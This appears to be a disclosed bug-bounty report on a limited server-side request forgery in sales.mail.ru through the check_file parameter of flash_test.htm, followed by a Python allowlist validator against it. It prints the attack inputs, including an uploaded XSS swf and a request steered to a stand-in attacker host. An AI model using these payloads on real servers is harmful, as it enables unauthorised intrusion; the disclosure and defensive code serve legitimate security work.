Mail.Ru: Potential SSRF in sales.mail.ru

2015-11-03T09:03:23
ID H1:97395
Type hackerone
Reporter paresh_parmar
Modified 2017-03-27T13:14:03

Description

SSRF in a project outside of the bug bounty program's scope. Although the project is out of scope, a bounty was awarded due to the severity of the problem.

I reported this issue as XSS one year ago. I found a directory where one can upload swf files, /flash_test.htm?show=upload, and I uploaded a malicious swf file with an XSS payload. The swf file was being uploaded to a 3rd-party domain, so it was executing there:

flash_test.htm?check_file=xss.swf|https://sandboxdomain.com/img/7D/E83D61.swf

But it was executing in a 3rd-party domain, so the team closed my report as N/A. At that time I forgot to check more. 3 months ago I decided to investigate more and found SSRF here:

flash_test.htm?check_file=xss.swf|http://evilhost.com/ssrf

and the response was received in my console. It was a limited SSRF.
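
A server-side check for the `check_file` value described in the report, as an added example that is not Mail.Ru's code or part of the original report. It assumes the value has the form `name|url` and that uploads are only ever stored on `sandboxdomain.com`; the function names and the allowlist are hypothetical.

```python
from urllib.parse import urlsplit

# Assumption: uploaded files live only on this host (taken from the
# report's own example URL); everything else is refused.
ALLOWED_HOSTS = {"sandboxdomain.com"}


class RejectedURL(ValueError):
    """Raised when a check_file value must not be fetched."""


def parse_check_file(value):
    """Split 'name|url' and return (name, url) only if url is safe to fetch."""
    name, sep, url = value.partition("|")
    if not sep or not name or not url:
        raise RejectedURL("expected 'name|url'")
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError as exc:
        raise RejectedURL("unparseable URL") from exc
    if parts.scheme != "https":
        raise RejectedURL("scheme must be https")
    if parts.username is not None or parts.password is not None:
        raise RejectedURL("userinfo is not allowed")
    if port not in (None, 443):
        raise RejectedURL("non-default port")
    host = (parts.hostname or "").lower().rstrip(".")
    if host not in ALLOWED_HOSTS:  # exact match, no suffix or substring test
        raise RejectedURL("host is not allowlisted")
    if not parts.path.lower().endswith(".swf"):
        raise RejectedURL("path is not a .swf file")
    return name, url


def is_allowed(value):
    """Boolean wrapper for callers that only need a yes/no answer."""
    try:
        parse_check_file(value)
        return True
    except RejectedURL:
        return False


if __name__ == "__main__":
    # First two values are from the report; the third is a constructed look-alike.
    for v in ("xss.swf|https://sandboxdomain.com/img/7D/E83D61.swf",
              "xss.swf|http://evilhost.com/ssrf",
              "xss.swf|https://sandboxdomain.com.evilhost.com/a.swf"):
        print(is_allowed(v), v)
```

The component that performs the fetch should also refuse to follow redirects, since a redirect from an allowlisted host would bypass this check.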